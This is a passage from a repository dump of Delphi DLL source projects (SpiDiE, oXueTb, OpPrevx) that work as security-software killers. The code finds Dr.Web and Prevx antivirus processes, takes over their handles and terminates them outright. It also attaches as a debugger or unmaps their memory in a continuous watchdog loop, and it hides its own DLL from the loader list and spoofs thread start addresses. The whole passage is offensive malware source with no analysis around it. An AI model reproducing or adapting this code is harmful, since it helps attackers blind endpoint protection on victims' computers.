xor eax, eax 188 | inc eax 189 | retn $000c 190 | end. 191 | 192 | 193 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.2 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = 'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | begin 152 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 153 | begin 154 | EventHandle := 0; 155 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 156 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 157 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 158 | begin 159 | hinst := LdrGetModuleHandle('dwunprot.dll'); 160 | ProcessHandlesCount := 0; 161 | memzero(@ProcessHandles, 100); 162 | FillProcessesArray(); 163 | 164 | for i := 0 to ProcessHandlesCount - 1 do 165 | begin 166 | strcpyW(@buf1[0], String1); 167 | 168 | uitohexW(ProcessHandles[i], strendW(buf1)); 169 | OutputDebugStringW(buf1); 170 | 171 | if (ZwTerminateProcess(ProcessHandles[i], 0) = STATUS_SUCCESS) then 172 | OutputDebugStringW('Gone to hell successfully') 173 | else 174 | OutputDebugStringW('Damn!!! Well you probably know whats next :)'); 175 | 176 | ZwClose(ProcessHandles[i]); 177 | end; 178 | 179 | ZwSetEvent(EventHandle, nil); 180 | ZwClose(EventHandle); 181 | end; 182 | end; 183 | end; 184 | 185 | asm 186 | call main 187 | xor eax, eax 188 | inc eax 189 | retn $000c 190 | end. 191 | 192 | 193 | -------------------------------------------------------------------------------- /Source/oXueTb/oxuetb_lib.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program oxuetb_lib; 7 | {$ENDIF} 8 | unit oxuetb_lib; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | 15 | implementation 16 | 17 | const 18 | String5: PWideChar = '\BaseNamedObjects\oxuetb'; 19 | String6: PWideChar = 'oxuetb.dll'; 20 | 21 | type 22 | _SYSINFOBUF = record 23 | uHandleCount: ULONG; 24 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 25 | end; 26 | SYSINFOBUF = _SYSINFOBUF; 27 | PSYSINFOBUF = ^_SYSINFOBUF; 28 | 29 | var 30 | TargetProcessHandle: THANDLE; 31 | TargetProcessId: THANDLE; 32 | 33 | SnapShotHandle: THANDLE; 34 | EventHandle: THANDLE; 35 | attr: OBJECT_ATTRIBUTES; 36 | str1: UNICODE_STRING; 37 | buf: array[0..PAGE_SIZE] of BYTE; 38 | buf1: LBuf; 39 | 40 | function OpenProcessTest(ProcessId: ULONG): boolean; stdcall; 41 | var 42 | hProcess: THANDLE; 43 | attr: OBJECT_ATTRIBUTES; 44 | cl1: CLIENT_ID; 45 | begin 46 | result := false; 47 | cl1.UniqueProcess := ProcessId; 48 | cl1.UniqueThread := 0; 49 | InitializeObjectAttributes(@attr, nil, 0, 0, nil); 50 | if (ZwOpenProcess(@hProcess, PROCESS_ALL_ACCESS, @attr, @cl1) = STATUS_SUCCESS) then 51 | begin 52 | ZwClose(hProcess); 53 | result := true; 54 | end; 55 | if (ProcessId = 0) or (ProcessId = 4) then result := true; 56 | end; 57 | 58 | procedure GetTargetProcess(); 59 | var 60 | h2: THANDLE; 61 | c: integer; 62 | bytesIO: ULONG; 63 | buf: PSYSINFOBUF; 64 | pbi: PROCESS_BASIC_INFORMATION; 65 | pp1: PSYSTEM_PROCESSES; 66 | membuf: PChar; 67 | begin 68 | membuf := nil; 69 | bytesIO := $400000; 70 | ZwAllocateVirtualMemory(NtCurrentProcess, @membuf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 71 | if (membuf = nil) then exit; 72 | if (ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, membuf, bytesIO, @bytesIO) = STATUS_SUCCESS) then 73 | begin 74 | pp1 := PSYSTEM_PROCESSES(membuf); 75 | while (1 = 1) do 76 | begin 77 | if (OpenProcessTest(pp1^.ProcessId) = FALSE) then 78 | begin 79 | TargetProcessId := pp1^.ProcessId; 80 | break; 81 | end; 82 | if (pp1^.NextEntryOffset = 0) then break; 83 | pp1 := PSYSTEM_PROCESSES(PChar(pp1) + pp1^.NextEntryOffset); 84 | end; 85 | end; 86 | bytesIO := 0; 87 | ZwFreeVirtualMemory(NtCurrentProcess, @membuf, @bytesIO, MEM_RELEASE); 88 | 89 | TargetProcessHandle := 0; 90 | bytesIO := 4194304; 91 | buf := nil; 92 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 93 | if (buf <> nil) then 94 | begin 95 | 96 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 97 | for c := 0 to buf^.uHandleCount - 1 do 98 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 99 | begin 100 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then 101 | begin 102 | 103 | h2 := buf^.rHandleTable[c].Handle; 104 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 105 | begin 106 | if (pbi.UniqueProcessId = TargetProcessId) then 107 | begin 108 | TargetProcessHandle := h2; 109 | break; 110 | end; 111 | end; 112 | 113 | end; 114 | end; 115 | bytesIO := 0; 116 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 117 | end; 118 | end; 119 | 120 | function KillProcess2(ProcessHandle: THANDLE): boolean; 121 | var 122 | { bytesIO: DWORD; 123 | buf: PSYSINFOBUF; 124 | 125 | c: integer; } 126 | pTeb1: PTEB; 127 | begin 128 | result := false; 129 | if (DbgUiConnectToDbg() <> STATUS_SUCCESS) then exit; 130 | if (DbgUiDebugActiveProcess(ProcessHandle) <> STATUS_SUCCESS) then exit; 131 | { bytesIO := 4194304; 132 | buf := nil; 133 | ZwAllocateVirtualMemory(NtCurrentProcess, @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 134 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 135 | for c := 0 to buf^.uHandleCount - 1 do 136 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 137 | begin 138 | if (buf^.rHandleTable[c].ObjectTypeNumber = $8) then 139 | begin 140 | ZwClose(buf^.rHandleTable[c].Handle); 141 | result := true; 142 | break; 143 | end; 144 | end; 145 | bytesIO := 0; 146 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE);} 147 | 148 | asm 149 | mov eax, fs:18h 150 | mov pTeb1, eax 151 | end; 152 | ZwClose(THANDLE(pTeb1^.DbgSsReserved[1])); 153 | end; 154 | 155 | procedure TryToKillProcess(); 156 | {var 157 | p1, p0: PChar; 158 | sz, oldp: ULONG;} 159 | begin 160 | { uitohexW(TargetProcessHandle, @buf1[0]); 161 | OutputDebugStringW(buf1); 162 | 163 | uitohexW(TargetProcessId, @buf1[0]); 164 | OutputDebugStringW(buf1); } 165 | 166 | { p0 := pointer($10000); 167 | repeat 168 | p1 := p0; 169 | sz := $1000; 170 | if (ZwProtectVirtualMemory(TargetProcessHandle, @p1, @sz, PAGE_EXECUTE_READWRITE, @oldp) = STATUS_SUCCESS) then 171 | ZwWriteVirtualMemory(TargetProcessHandle, p0, @buf, PAGE_SIZE, @oldp); 172 | p0 := p0 + $1000; 173 | until (DWORD(p0) >= $80000000);} 174 | KillProcess2(TargetProcessHandle); 175 | ZwClose(TargetProcessHandle); 176 | end; 177 | 178 | procedure main(); 179 | begin 180 | EventHandle := 0; 181 | Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE); 182 | RtlInitUnicodeString(@str1, String5); 183 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 184 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 185 | begin 186 | GetTargetProcess(); 187 | TryToKillProcess(); 188 | ZwSetEvent(EventHandle, nil); 189 | ZwClose(EventHandle); 190 | end; 191 | end; 192 | 193 | asm 194 | call main 195 | xor eax, eax 196 | inc eax 197 | retn $000c 198 | end. 199 | 200 | -------------------------------------------------------------------------------- /Source/SpiDiE/v1.4.7 release/dwunprot.dpr: -------------------------------------------------------------------------------- 1 | {$E DLL} 2 | {$IMAGEBASE $00600000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program dwunprot; 7 | {$ENDIF} 8 | unit dwunprot; 9 | interface 10 | 11 | {$R Resources.res} 12 | 13 | uses 14 | Windows, WinNative, RTL; 15 | 16 | 17 | implementation 18 | 19 | const 20 | DrWebProcessesMax = 6; 21 | DrWebProcesses: array[0..DrWebProcessesMax] of PWideChar = ( 22 | 'drweb32w.exe', 'dwengine.exe', 'spiderml.exe', 'spidernt.exe', 'spiderui.exe', 'spidergate.exe', 'spideragent.exe'); 23 | 24 | var 25 | hinst: DWORD = $00600000; 26 | DrWebID: array[0..DrWebProcessesMax] of DWORD; 27 | 28 | function LdrGetModuleHandle(lpModule: PWideChar): THANDLE; stdcall; 29 | var 30 | pTeb1: PTEB; 31 | f: LIST_ENTRY; 32 | cur: PLIST_ENTRY; 33 | begin 34 | result := 0; 35 | asm 36 | mov eax, large fs:18h 37 | mov pTeb1, eax 38 | end; 39 | if (lpModule = nil) then 40 | begin 41 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 42 | exit; 43 | end; 44 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 45 | cur := f.Flink; 46 | while (true) do 47 | begin 48 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 49 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 50 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 51 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 52 | begin 53 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 54 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 55 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 56 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 57 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 58 | break; 59 | end; 60 | cur := cur^.Flink; 61 | if (cur = nil) or (cur = f.Flink) then break; 62 | end; 63 | end; 64 | 65 | var 66 | ProcessHandles: array[0..99] of THANDLE; 67 | ProcessHandlesCount: integer; 68 | 69 | type 70 | _SYSINFOBUF = record 71 | uHandleCount: ULONG; 72 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 73 | end; 74 | SYSINFOBUF = _SYSINFOBUF; 75 | PSYSINFOBUF = ^_SYSINFOBUF; 76 | 77 | var 78 | pBuffer: PROCESSENTRY32W; 79 | SnapShotHandle: THANDLE; 80 | 81 | procedure FillProcessesArray(); 82 | var 83 | h2: THANDLE; 84 | bytesIO: ULONG; 85 | buf: PSYSINFOBUF; 86 | last, i, c: integer; 87 | pbi: PROCESS_BASIC_INFORMATION; 88 | begin 89 | last := 0; 90 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 91 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 92 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 93 | begin 94 | if Process32FirstW(SnapShotHandle, @pBuffer) then 95 | repeat 96 | 97 | if (last = DrWebProcessesMax) then break; 98 | for i := 0 to DrWebProcessesMax do 99 | begin 100 | if (strcmpiW(pBuffer.szExeFile, DrWebProcesses[i]) = 0) then 101 | begin 102 | DrWebID[last] := pBuffer.th32ProcessID; 103 | inc(last); 104 | end; 105 | end; 106 | 107 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 108 | CloseHandle(SnapShotHandle); 109 | end; 110 | 111 | bytesIO := 4194304; 112 | buf := nil; 113 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 114 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 115 | for c := 0 to buf^.uHandleCount - 1 do 116 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) then 117 | begin 118 | if (buf^.rHandleTable[c].ObjectTypeNumber = 5) then //Process Type Object ID 119 | begin 120 | h2 := buf^.rHandleTable[c].Handle; 121 | if (ZwQueryInformationProcess(h2, ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 122 | begin 123 | for i := 0 to DrWebProcessesMax do 124 | begin 125 | if (pbi.UniqueProcessId = DrWebID[i]) then 126 | begin 127 | ProcessHandles[ProcessHandlesCount] := h2; 128 | inc(ProcessHandlesCount); 129 | end; 130 | end; 131 | end; 132 | 133 | end; 134 | end; 135 | bytesIO := 0; 136 | ZwFreeVirtualMemory(GetCurrentProcess(), @buf, @bytesIO, MEM_RELEASE); 137 | end; 138 | 139 | var 140 | buf1: LBuf; 141 | EventHandle: THANDLE; 142 | attr: OBJECT_ATTRIBUTES; 143 | str1: UNICODE_STRING; 144 | 145 | const 146 | String1: PWideChar = #20'Terminating by handle 0x'; 147 | 148 | procedure main(); 149 | var 150 | i: integer; 151 | hProcess: THANDLE; 152 | ns: NTSTATUS; 153 | begin 154 | if (Internal_AdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE) = STATUS_SUCCESS) then 155 | begin 156 | EventHandle := 0; 157 | RtlInitUnicodeString(@str1, '\BaseNamedObjects\dwunprotwait'); 158 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 159 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 160 | begin 161 | hinst := LdrGetModuleHandle('dwunprot.dll'); 162 | ProcessHandlesCount := 0; 163 | memzero(@ProcessHandles, 100); 164 | FillProcessesArray(); 165 | 166 | for i := 0 to ProcessHandlesCount - 1 do 167 | begin 168 | hProcess := ProcessHandles[i]; 169 | ns := ZwTerminateProcess(hProcess, 0); 170 | 171 | if (ns = STATUS_SUCCESS) then 172 | OutputDebugStringW('Successfully terminated') 173 | else 174 | OutputDebugStringW('Holy fuck!!! Well you probably know whats next :)'); 175 | ZwClose(ProcessHandles[i]); 176 | 177 | strcpyW(@buf1[0], String1); 178 | uitohexW(ProcessHandles[i], strendW(buf1)); 179 | OutputDebugStringW(buf1); 180 | end; 181 | 182 | ZwSetEvent(EventHandle, nil); 183 | ZwClose(EventHandle); 184 | end; 185 | end; 186 | end; 187 | 188 | asm 189 | call main 190 | xor eax, eax 191 | inc eax 192 | retn $000c 193 | end. 194 | 195 | -------------------------------------------------------------------------------- /Source/OpPrevx/v1.1.220/lib.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program lib; 7 | {$ENDIF} 8 | unit lib; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | 15 | implementation 16 | 17 | const 18 | String5: PWideChar = '\BaseNamedObjects\prevxfuck'; 19 | ProcessesMaxID = 1; 20 | TargetProcesses: array[0..ProcessesMaxID] of PWideChar = ('prevx.exe', ''); 21 | 22 | type 23 | _SYSINFOBUF = record 24 | uHandleCount: ULONG; 25 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 26 | end; 27 | SYSINFOBUF = _SYSINFOBUF; 28 | PSYSINFOBUF = ^_SYSINFOBUF; 29 | 30 | var 31 | ProcessHandles: array[0..31] of THANDLE; 32 | ProcessesID: array[0..ProcessesMaxID] of DWORD; 33 | ProcessHandlesCount: integer = 0; 34 | 35 | SnapShotHandle: THANDLE; 36 | EventHandle: THANDLE; 37 | pBuffer: PROCESSENTRY32W; 38 | attr: OBJECT_ATTRIBUTES; 39 | str1: UNICODE_STRING; 40 | buf: array[0..PAGE_SIZE] of BYTE; 41 | buf1: LBuf; 42 | 43 | function FillProcessesArray(): boolean; 44 | var 45 | bFound: boolean; 46 | bytesIO: ULONG; 47 | buf: PSYSINFOBUF; 48 | last, i, c: integer; 49 | pbi: PROCESS_BASIC_INFORMATION; 50 | begin 51 | result := false; 52 | 53 | ProcessHandlesCount := 0; 54 | memzero(@ProcessesID, sizeof(ProcessesID)); 55 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 56 | 57 | last := 0; 58 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 59 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 60 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 61 | begin 62 | if Process32FirstW(SnapShotHandle, @pBuffer) then 63 | repeat 64 | 65 | for i := 0 to ProcessesMaxID - 1 do 66 | begin 67 | if (strcmpiW(pBuffer.szExeFile, TargetProcesses[i]) = 0) then 68 | begin 69 | ProcessesID[last] := pBuffer.th32ProcessID; 70 | inc(last); 71 | end; 72 | end; 73 | 74 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 75 | CloseHandle(SnapShotHandle); 76 | end else exit; 77 | 78 | bytesIO := 4194304; 79 | buf := nil; 80 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 81 | if (buf <> nil) then 82 | begin 83 | 84 | ZwQuerySystemInformation(SystemHandleInformation, buf, 4194304, @bytesIO); 85 | for c := 0 to Integer(buf^.uHandleCount) - 1 do 86 | if (buf^.rHandleTable[c].ProcessId = NtGetCurrentProcessId()) and (buf^.rHandleTable[c].ObjectTypeNumber = 5) then 87 | begin 88 | ProcessHandles[ProcessHandlesCount] := buf^.rHandleTable[c].Handle; 89 | 90 | bFound := false; 91 | if (ZwQueryInformationProcess(ProcessHandles[ProcessHandlesCount], ProcessBasicInformation, @pbi, sizeof(pbi), @bytesIO) = STATUS_SUCCESS) then 92 | begin 93 | 94 | for i := 0 to ProcessesMaxID do 95 | if (pbi.UniqueProcessId = ProcessesID[i]) then 96 | begin 97 | bFound := true; 98 | inc(ProcessHandlesCount); 99 | break; 100 | end; 101 | 102 | end; 103 | if not bFound then 104 | ProcessHandles[ProcessHandlesCount] := 0; 105 | 106 | end; 107 | bytesIO := 0; 108 | ZwFreeVirtualMemory(NtCurrentProcess, @buf, @bytesIO, MEM_RELEASE); 109 | end; 110 | result := (ProcessHandlesCount > 0); 111 | end; 112 | 113 | procedure KillProcesses(); 114 | var 115 | i: integer; 116 | p0: ULONG; 117 | begin 118 | for i := 0 to ProcessHandlesCount - 1 do 119 | begin 120 | p0 := $40000000; 121 | repeat 122 | //uitohexW(p0, @buf1[0]); 123 | ZwUnmapViewOfSection(ProcessHandles[i], PVOID(p0)); 124 | //if (ZwUnmapViewOfSection(ProcessHandles[i], PVOID(p0)) = STATUS_SUCCESS) then OutputDebugStringW(buf1); 125 | p0 := p0 + PAGE_SIZE; 126 | until (DWORD(p0) >= $80000000); 127 | end; 128 | end; 129 | 130 | function LdrHideDll(lpModule: PWideChar): THANDLE; stdcall; 131 | var 132 | pTeb1: PTEB; 133 | f: LIST_ENTRY; 134 | cur: PLIST_ENTRY; 135 | begin 136 | result := 0; 137 | asm 138 | mov eax, large fs:18h 139 | mov pTeb1, eax 140 | end; 141 | if (lpModule = nil) then 142 | begin 143 | result := Cardinal(pTeb1^.Peb^.ImageBaseAddress); 144 | exit; 145 | end; 146 | f := pTeb1^.Peb^.Ldr^.InLoadOrderModuleList; 147 | cur := f.Flink; 148 | while (true) do 149 | begin 150 | if (PLDR_MODULE(cur)^.EntryPoint <> nil) then 151 | if (PLDR_MODULE(cur)^.BaseDllName.PStr <> nil) and 152 | not IsBadReadPtr(PLDR_MODULE(cur)^.BaseDllName.PStr, PLDR_MODULE(cur)^.BaseDllName.Length) then 153 | if (strcmpiW(PLDR_MODULE(cur)^.BaseDllName.PStr, lpModule) = 0) then 154 | begin 155 | result := THANDLE(PLDR_MODULE(cur)^.DllBase); 156 | PLDR_MODULE(cur^.Blink)^.InLoadOrderModuleList.Flink := 157 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Flink; 158 | PLDR_MODULE(cur^.Flink)^.InLoadOrderModuleList.Blink := 159 | PLDR_MODULE(cur)^.InLoadOrderModuleList.Blink; 160 | break; 161 | end; 162 | cur := cur^.Flink; 163 | if (cur = nil) or (cur = f.Flink) then break; 164 | end; 165 | end; 166 | 167 | function WatchDog(p1: pvoid): DWORD; stdcall; 168 | begin 169 | result := 0; 170 | EventHandle := 0; 171 | RtlInitUnicodeString(@str1, String5); 172 | InitializeObjectAttributes(@attr, @str1, OBJ_CASE_INSENSITIVE, 0, nil); 173 | if (ZwOpenEvent(@EventHandle, EVENT_ALL_ACCESS, @attr) = STATUS_SUCCESS) then 174 | begin 175 | ZwSetEvent(EventHandle, nil); 176 | ZwClose(EventHandle); 177 | end; 178 | 179 | LdrHideDll('nel32.dll'); 180 | EventHandle := DWORD(GetModuleHandle('winsrv.dll')) + $7CDF; 181 | ZwSetInformationThread(NtCurrentThread, ThreadQuerySetWin32StartAddress, @EventHandle, sizeof(DWORD)); 182 | 183 | if FillProcessesArray() then 184 | begin 185 | KillProcesses(); 186 | 187 | while true do 188 | begin 189 | NtSleep(200); 190 | if FillProcessesArray() then 191 | KillProcesses(); 192 | end; 193 | 194 | end; 195 | end; 196 | 197 | procedure main(); 198 | var 199 | ThreadId: ULONG; 200 | begin 201 | ZwClose(CreateThread(nil, 0, @WatchDog, nil, 0, ThreadId)); 202 | end; 203 | 204 | asm 205 | call main 206 | xor eax, eax 207 | inc eax 208 | retn $000c 209 | end. 210 | 211 | -------------------------------------------------------------------------------- /Source/OpPrevx/dev_190/unprevx_lib.dpr: -------------------------------------------------------------------------------- 1 | {$E dll} 2 | {$IMAGEBASE $00400000} 3 | {$R-} 4 | {$Q-} 5 | {$IFDEF minimum} 6 | program unprevx_lib; 7 | {$ENDIF} 8 | unit unprevx_lib; 9 | interface 10 | 11 | uses 12 | Windows, WinNative, RTL; 13 | 14 | 15 | implementation 16 | 17 | const 18 | String5: PWideChar = '\BaseNamedObjects\UnPrevxMeHarder'; 19 | ProcessesMaxID = 1; 20 | TargetProcesses: array[0..ProcessesMaxID] of PWideChar = ('Prevx.exe', ''); 21 | 22 | type 23 | _SYSINFOBUF = record 24 | uHandleCount: ULONG; 25 | rHandleTable: array[0..0] of SYSTEM_HANDLE_INFORMATION; 26 | end; 27 | SYSINFOBUF = _SYSINFOBUF; 28 | PSYSINFOBUF = ^_SYSINFOBUF; 29 | 30 | var 31 | ProcessHandles: array[0..31] of THANDLE; 32 | ProcessesID: array[0..ProcessesMaxID] of DWORD; 33 | ProcessHandlesCount: integer = 0; 34 | 35 | SnapShotHandle: THANDLE; 36 | EventHandle: THANDLE; 37 | pBuffer: PROCESSENTRY32W; 38 | attr: OBJECT_ATTRIBUTES; 39 | str1: UNICODE_STRING; 40 | buf: array[0..PAGE_SIZE] of BYTE; 41 | buf1: LBuf; 42 | 43 | function FillProcessesArray(): boolean; 44 | var 45 | bFound: boolean; 46 | bytesIO: ULONG; 47 | buf: PSYSINFOBUF; 48 | last, i, c: integer; 49 | pbi: PROCESS_BASIC_INFORMATION; 50 | begin 51 | result := false; 52 | 53 | ProcessHandlesCount := 0; 54 | memzero(@ProcessesID, sizeof(ProcessesID)); 55 | memzero(@ProcessHandles, sizeof(ProcessHandles)); 56 | 57 | last := 0; 58 | pBuffer.dwSize := sizeof(PROCESSENTRY32W); 59 | SnapShotHandle := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); 60 | if (SnapShotHandle <> INVALID_HANDLE_VALUE) then 61 | begin 62 | if Process32FirstW(SnapShotHandle, @pBuffer) then 63 | repeat 64 | 65 | for i := 0 to ProcessesMaxID - 1 do 66 | begin 67 | if (strcmpiW(pBuffer.szExeFile, TargetProcesses[i]) = 0) then 68 | begin 69 | ProcessesID[last] := pBuffer.th32ProcessID; 70 | inc(last); 71 | end; 72 | end; 73 | 74 | until (not Process32NextW(SnapShotHandle, @pBuffer)); 75 | CloseHandle(SnapShotHandle); 76 | end else exit; 77 | 78 | bytesIO := 4194304; 79 | buf := nil; 80 | ZwAllocateVirtualMemory(DWORD(-1), @buf, 0, @bytesIO, MEM_COMMIT, PAGE_READWRITE); 81 | if (buf <> nil) then 82 | begin 83 | 84 | 